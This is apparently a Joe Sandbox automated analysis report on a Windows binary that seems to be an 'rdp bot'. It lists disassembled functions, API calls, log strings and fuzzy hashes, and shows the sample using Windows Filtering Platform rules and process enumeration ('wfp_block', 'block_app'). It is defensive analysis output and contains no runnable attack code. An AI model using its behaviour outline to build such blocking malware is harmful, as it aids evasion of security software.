[D] (%s) -> Done(name=%s), xrefs: 00007FF764CC9CCD
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CC9BF4, 00007FF764CC9C27, 00007FF764CC9C5A
NULL, xrefs: 00007FF764CC9D24
(sec != NULL), xrefs: 00007FF764CC9C61
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC9C09, 00007FF764CC9C3C, 00007FF764CC9C6F

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: a7db43b5a7dd92ac6232257caf0c21fec7302e7fa8c733100f6bb5046820c587
Instruction ID: b3a8a882649535250f77d3c6dc5267fb00df151e7a676f347dbe37ebf8f25962
Opcode Fuzzy Hash: a7db43b5a7dd92ac6232257caf0c21fec7302e7fa8c733100f6bb5046820c587
Instruction Fuzzy Hash: BB41FAA1A08647D1FE20BF56E9807B4E2A0FF40348FD85137DA0E1AB91DE7CE945C760

Function 00007FF764CCA0F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.MSVCRT ref: 00007FF764CCA18A
_errno.MSVCRT ref: 00007FF764CCA1A8
_errno.MSVCRT ref: 00007FF764CCA1B4

Strings

ini_get_uint32, xrefs: 00007FF764CCA169, 00007FF764CCA1D4
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF764CCA1DB
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CCA15B
(value != NULL), xrefs: 00007FF764CCA162
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CCA170

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 51c7bf59d24ef80073534a75ab36317efd70ee14cd23d71745753a06ee0d1032
Instruction ID: 83fe706df551c381aa921d422c82564dc486d6326dd34941ada22cbef21ce387
Opcode Fuzzy Hash: 51c7bf59d24ef80073534a75ab36317efd70ee14cd23d71745753a06ee0d1032
Instruction Fuzzy Hash: AF214F62A08A46D6EB21EF16F8807AAB760FB84784F845137EE4C47754DF3DE945CB20

Function 00007FF764CC14E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF764CC158E
fflush.MSVCRT ref: 00007FF764CC159A
EnterCriticalSection.KERNEL32 ref: 00007FF764CC15B3
LeaveCriticalSection.KERNEL32 ref: 00007FF764CC15DB
CopyFileA.KERNEL32 ref: 00007FF764CC1638

Strings

1, xrefs: 00007FF764CC1622
., xrefs: 00007FF764CC161D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1
API String ID: 513531256-1839485796
Opcode ID: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
Instruction ID: 6bf4113b69e841575db69034cce4a7c04fbad56eb94b350c24bb3f43eeecb274
Opcode Fuzzy Hash: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
Instruction Fuzzy Hash: F9416125A0C641C6FB20BF17E8907BAA690BB89784FC44136D90D47796DF2DE581CB60

Function 00007FF764CC76D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FwpmProviderDestroyEnumHandle0.FWPUCLNT ref: 00007FF764CC7822
wcscmp.MSVCRT ref: 00007FF764CC786D

Strings

[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx), xrefs: 00007FF764CC77D7
[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx), xrefs: 00007FF764CC77F4
[E] (%s) -> FwpmProviderAdd0 failed(res=%08lx), xrefs: 00007FF764CC7944
setup_filt_prov, xrefs: 00007FF764CC77D0, 00007FF764CC77ED, 00007FF764CC793D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: DestroyEnumFwpmHandle0Providerwcscmp
String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
API String ID: 1522850966-2029202777
Opcode ID: b84bd1504df7614f6630813681ba61713a050ef6a538e12cd96e288b6b783d6a
Instruction ID: b052006e5bf96002e4086e8aff6ecc89db84d04b957a9d9e29fe3300a7c75d01
Opcode Fuzzy Hash: b84bd1504df7614f6630813681ba61713a050ef6a538e12cd96e288b6b783d6a
Instruction Fuzzy Hash: C8519335619B82C5FB30AF16F4803AAA3A6FB80784F409136DA8D47B59EF3DD440CB90

Function 00007FF764CC9621 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF764CC76D0: wcscmp.MSVCRT ref: 00007FF764CC786D

FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,0000023B627E14D0,?,00007FF764CC14B4,?,?,00000001,00007FF764CC14D2), ref: 00007FF764CC9701

Strings

ip4, xrefs: 00007FF764CC967A
[E] (%s) -> FwpmEngineOpen0 failed(res=%08lx), xrefs: 00007FF764CC96BA
app, xrefs: 00007FF764CC96E0
wfp_block, xrefs: 00007FF764CC96B3
svc, xrefs: 00007FF764CC9728

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Close0EngineFwpmwcscmp
String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
API String ID: 4239307310-774261742
Opcode ID: 1779572da26f08be6a49a7d3c2c20cf19122b058afad2e1e1c3b112107f5d3a9
Instruction ID: b2ff03af516dc354d540ec3966b4a4bfca50217e53e43ff9949e10ff4e5a0af5
Opcode Fuzzy Hash: 1779572da26f08be6a49a7d3c2c20cf19122b058afad2e1e1c3b112107f5d3a9
Instruction Fuzzy Hash: 0B318F51B1C643C1FA70BF6BA5D02BA92519F497C8FD02033EA4E8B7D5EE5CD8458B60

Function 00007FF764CC6497 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF764CC64A0
GetLastError.KERNEL32 ref: 00007FF764CC64E5

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC64BD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC64D2
(path != NULL), xrefs: 00007FF764CC64C4
fs_path_exists, xrefs: 00007FF764CC64CB

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: f857fc96a45243b8d675c7de72616403e7cd54f327aa169ba606177cfb7c0d27
Instruction ID: d7f0cca7ea840d3e24cd42ee70215aded4bebc4d652bf43b60250956aff70fe4
Opcode Fuzzy Hash: f857fc96a45243b8d675c7de72616403e7cd54f327aa169ba606177cfb7c0d27
Instruction Fuzzy Hash: C521A350F0CC83C2FB30EF6A96C4379A2405F5070AFE47533E10E8A798DE1CE8859A66

Function 00007FF764CC1C73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF764CC1C93

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

GetLastError.KERNEL32 ref: 00007FF764CC1CC6

Strings

module_get_proc, xrefs: 00007FF764CC1CAC, 00007FF764CC1CD6
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF764CC1CB3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF764CC1CDD

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: b272c91321a469efff73e5e126942c115d99d642664b1a9ab91995e88760635f
Instruction ID: f17e94393856e5ba8388d2afc91738ab39bfb1e260acd81733404160379509db
Opcode Fuzzy Hash: b272c91321a469efff73e5e126942c115d99d642664b1a9ab91995e88760635f
Instruction Fuzzy Hash: 9FF08CA0A08603C2FE61AF5BA8905F5E6516F04BD0F988433EC4C0B794EE2CE946CB20

Function 00007FF764CC89E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF764CC8671
GetLastError.KERNEL32 ref: 00007FF764CC867D
CloseHandle.KERNEL32 ref: 00007FF764CC8A16

Strings

block_app, xrefs: 00007FF764CC868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF764CC8694

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 0844c597dbd8a6f5ee97e7fbdf74e2f9312bd5830c43fa9e4d981874f003747c
Instruction ID: 107cbe6e8add916c316ed32672a64bd99c185d603e92d867b0bcccc0f55bcb16
Opcode Fuzzy Hash: 0844c597dbd8a6f5ee97e7fbdf74e2f9312bd5830c43fa9e4d981874f003747c
Instruction Fuzzy Hash: BCF0F991A0CA03C5FE347F1B98D457A9691AF45746FD06833C40E86395EE2CE945CB34

Function 00007FF764CC89E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF764CC8671
GetLastError.KERNEL32 ref: 00007FF764CC867D
CloseHandle.KERNEL32 ref: 00007FF764CC8A16

Strings

block_app, xrefs: 00007FF764CC868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF764CC8694

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: f0cf56fa59122cdf6f35d599a095bde5a8af241929c9135850f50687308cf45f
Instruction ID: 8f410d75fe55aea4b37b42ffa541c8063bce4bf20ad01d3014a7c4b1fdf92a4c
Opcode Fuzzy Hash: f0cf56fa59122cdf6f35d599a095bde5a8af241929c9135850f50687308cf45f
Instruction Fuzzy Hash: CDF0F991A0CA03C5FE347F1B98D457A9691AF45746FD06833C40E86395EE2CE945CB34

Function 00007FF764CC89D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF764CC8671
GetLastError.KERNEL32 ref: 00007FF764CC867D
CloseHandle.KERNEL32 ref: 00007FF764CC8A16

Strings

block_app, xrefs: 00007FF764CC868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF764CC8694

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 8c583b02844f7365fe10fdef02dd7f147e5953e646258f17a39fa72fb5aca8cc
Instruction ID: 7a4578d28f008a209aa9dc6a21998f35055b735e4f448f3200de48c03eb4bc2c
Opcode Fuzzy Hash: 8c583b02844f7365fe10fdef02dd7f147e5953e646258f17a39fa72fb5aca8cc
Instruction Fuzzy Hash: CFF0F995A0CA03C5FE347F1B98D457A9691AF45746FD06833C40E86395EE2CE945CB34

Function 00007FF764CC8A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF764CC8671
GetLastError.KERNEL32 ref: 00007FF764CC867D
CloseHandle.KERNEL32 ref: 00007FF764CC8A16

Strings

block_app, xrefs: 00007FF764CC868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF764CC8694

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 8ede226555eb87350e4d9812cf06a02a45475cc6dcbef2c2e6915899342c15b3
Instruction ID: a1bc34ba86044469ac545c78af7792dba010ab768f64896d9103be36783fed3a
Opcode Fuzzy Hash: 8ede226555eb87350e4d9812cf06a02a45475cc6dcbef2c2e6915899342c15b3
Instruction Fuzzy Hash: 1EF0F991A0CA03C5FF347F1B98D457A9691AF45746FD06833C44E86395EE2CE945CB34

Function 00007FF764CC1CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF764CC1D02

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

GetLastError.KERNEL32 ref: 00007FF764CC1D2E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF764CC1D41
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF764CC1D1D
module_load, xrefs: 00007FF764CC1D16, 00007FF764CC1D3A

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 838ab5ad81db8fa0c9906e020a469101170339cfb8dec6f9f79846ce8c234f0c
Instruction ID: b8beedf40af9b67e5e609be1934415407869410d96de01ed45ecce8b57025457
Opcode Fuzzy Hash: 838ab5ad81db8fa0c9906e020a469101170339cfb8dec6f9f79846ce8c234f0c
Instruction Fuzzy Hash: E8F05E10E0A607C0FD61BF5BA8D05F0A6516F18B94FC86033CC0D17751FD1CA986CB20

Function 00007FF764CC49A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624

Function 00007FF764CC499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624

Function 00007FF764CC4992 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
